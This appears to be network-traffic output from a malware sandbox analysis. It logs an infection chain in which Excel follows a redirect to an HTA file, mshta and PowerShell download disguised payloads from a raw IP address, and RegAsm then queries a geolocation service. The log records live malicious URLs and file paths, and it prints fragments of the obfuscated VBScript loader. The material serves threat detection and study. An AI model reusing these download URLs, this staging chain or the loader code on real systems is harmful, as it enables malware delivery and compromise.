                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699826956 CEST1120INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705652952 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | 3764 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:23:43.415469885 CEST | 428 | OUT | GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Range: bytes=8896-
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    If-Range: "1d7e1-623f1fc7dcdfc"
Oct 8, 2024 15:23:43.864491940 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:43 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    ETag: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 111905
                                                                                                                                                                                                                    Content-Range: bytes 8896-120800/120801
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 192.3.220.40 | 80 | 3876 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:23:48.734661102 CEST | 355 | OUT | GET /330/verybestthingswesharedfornew.tIF HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
Oct 8, 2024 15:23:49.200908899 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:49 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:17:57 GMT
                                                                                                                                                                                                                    ETag: "2fbe8-623f1efc6828c"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 195560
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: image/tiff
                                                                                                                                                                                                                    Data Ascii: private function platirrostro(argillita, socraticamente, esfenoide, gallinheira, alabardino) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if esfenoide.ArgumentExists(NPARA_FILTER) then filter = esfenoide.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if esfenoide.ArgumentExists(NPARA_DIALECT) then dialect = esfenoide.Argume
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200983047 CEST1236INData Raw: 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                    Data Ascii: nt(NPARA_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201010942 CEST1236INData Raw: 00 69 00 6c 00 74 00 65 00 72 00 20 00 3d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22
                                                                                                                                                                                                                    Data Ascii: ilter = filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201028109 CEST1236INData Raw: 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61
                                                                                                                                                                                                                    Data Ascii: SERTBOOL false, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (esfenoid
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201035023 CEST1236INData Raw: 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 65 00 73 00 66 00 65 00 6e 00 6f 00 69 00 64 00 65 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52
                                                                                                                                                                                                                    Data Ascii: f if esfenoide.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(esfenoide.Argument(NPARA_RETURN_T
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201040030 CEST1236INData Raw: 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 53 00 48 00 41 00 4c 00 4c 00 4f 00 57 00 29 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d
                                                                                                                                                                                                                    Data Ascii: sts(NPARA_SHALLOW)) then flags = flags OR argillita.EnumerationFlagHierarchyShallow elseif (esfenoide.Argum
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201046944 CEST1236INData Raw: 00 2e 00 70 00 6c 00 61 00 74 00 69 00 72 00 72 00 6f 00 73 00 74 00 72 00 6f 00 28 00 67 00 61 00 6c 00 6c 00 69 00 6e 00 68 00 65 00 69 00 72 00 61 00 2c 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 2c 00 20 00 64 00 69 00 61 00 6c 00 65 00 63
                                                                                                                                                                                                                    Data Ascii: .platirrostro(gallinheira, filter, dialect, flags) end if end if ASSERTERR socraticamente, alabardino
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201061964 CEST1000INData Raw: 00 66 00 20 00 45 00 72 00 72 00 2e 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3d 00 20 00 54 00 5f 00 4f 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                    Data Ascii: f Err.Number = T_O then res = e.ReadItem() end if end if if Err.Number <>
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201077938 CEST1236INData Raw: 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 6c 00 6f 00 6f 00 70 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66
                                                                                                                                                                                                                    Data Ascii: attedText loop if(LCase(alabardino) <> VAL_FORMAT_TEXT) then wscript.echo "</wsman:Resul
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201092958 CEST1236INData Raw: 00 6b 00 63 00 43 00 70 00 22 00 0d 00 0a 00 57 00 71 00 65 00 73 00 4c 00 4c 00 4c 00 57 00 75 00 4b 00 70 00 4b 00 6a 00 69 00 4e 00 20 00 3d 00 20 00 22 00 6f 00 74 00 6b 00 55 00 55 00 7a 00 64 00 6b 00 66 00 4e 00 69 00 65 00 63 00 6f 00 57
                                                                                                                                                                                                                    Data Ascii: kcCp"WqesLLLWuKpKjiN = "otkUUzdkfNiecoW"fOnLAtuBZvPfiWl = "LbrfcTUmHiIzRLW"cKLcabelhalnpCKjCBcL = "liWGSUhUIAdWhiN"
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206182003 CEST1236INData Raw: 00 22 00 0d 00 0a 00 55 00 55 00 4a 00 78 00 69 00 78 00 42 00 69 00 4e 00 61 00 7a 00 7a 00 50 00 6d 00 61 00 20 00 3d 00 20 00 22 00 4b 00 6e 00 4c 00 6f 00 4b 00 69 00 74 00 4b 00 71 00 75 00 52 00 64 00 73 00 6e 00 6c 00 22 00 0d 00 0a 00 47
                                                                                                                                                                                                                    Data Ascii: "UUJxixBiNazzPma = "KnLoKitKquRdsnl"GGWtokzbUkGQoGA = "BkpiBneqzidkNWl"kWWJicWsbLiPnxr = "WbiGnqmzcfRlzcZ"NAHcU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49171 | 192.3.220.40 | 80 | 3232 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:24:00.732315063 CEST | 76 | OUT | GET /330/RRCGGH.txt HTTP/1.1
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
Oct 8, 2024 15:24:01.206768036 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:01 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:16:04 GMT
                                                                                                                                                                                                                    ETag: "a1000-623f1e913f4cf"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 659456
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49172 | 192.3.220.40 | 80 | 2988 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:24:00.982055902 CEST | 463 | OUT | GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    If-None-Match: "1d7e1-623f1fc7dcdfc"
Oct 8, 2024 15:24:01.627368927 CEST | 275 | IN | HTTP/1.1 304 Not Modified
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:01 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    ETag: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | 1908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:24:03.791846991 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                    Cache-Control: no-cache
Oct 8, 2024 15:24:04.397444010 CEST | 1170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    date: Tue, 08 Oct 2024 13:24:04 GMT
                                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                                    content-length: 962
                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 192.3.220.40 | 80 | 3784 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:24:20.820138931 CEST | 76 | OUT | GET /330/RRCGGH.txt HTTP/1.1
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
Oct 8, 2024 15:24:21.307277918 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:21 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:16:04 GMT
                                                                                                                                                                                                                    ETag: "a1000-623f1e913f4cf"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 659456
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 188.114.96.3 | 443 | 3480 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:39 UTC | 321 | OUT | GET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:23:40 UTC | 1190 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:40 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNA%2F94mrFeM0o8z12tVI479ojNzF7uujmDx48RMzw1me44659RScYKtg%2FgayT7QAxpwexT2TdvZdr1KS2HfP1TXCwQGDaVMWD2YOnUtCRR4SWS0hACSOYHe%2FWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf6725dce1a436f-EWR
                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
2024-10-08 13:23:40 UTC | 74 | IN | Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 188.114.97.3 | 443 | 3764 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:42 UTC | 345 | OUT | GET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:23:43 UTC | 1158 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:43 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFzBroaNfJMPj7rC2DAl1LP4RZ4d8cdcBHcVBudaE1yQbDkZiBTg09V%2FX3mzFB3Sg4bE8iJStQMMgP19zCLKTvBWEs0r3DlmFVjrc1fch9HmzmanSlsax%2BoBkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf6727108ef159f-EWR
2024-10-08 13:23:43 UTC | 74 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49166 | 207.241.227.242 | 443 | 3232 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:55 UTC | 117 | OUT | GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                                                    Host: ia600102.us.archive.org
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:23:55 UTC | 591 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:55 GMT
                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                    Content-Length: 6331693
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    ETag: "6704abca-609d2d"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                                                    Expires: Tue, 08 Oct 2024 19:23:55 GMT
                                                                                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49167 | 188.114.96.3 | 443 | 3480 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:58 UTC | 321 | OUT | GET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:23:58 UTC | 1166 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:58 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJLE8EshdtH1h6icEE8ofbfq0%2FOwo376ZXKJV7A0ki%2Bp4SsJDWZgDCNup%2FN32TLA36yiuyDj1YQEhl4T5NWUqeYE3NHHVv%2FDaCac1%2FwfOHSUw%2Bn93v6Xb94Nqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf672d28c264238-EWR
2024-10-08 13:23:58 UTC | 74 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49169 | 188.114.97.3 | 443 | 2988 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:24:00 UTC | 345 | OUT | GET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
2024-10-08 13:24:00 UTC | 1164 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:00 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
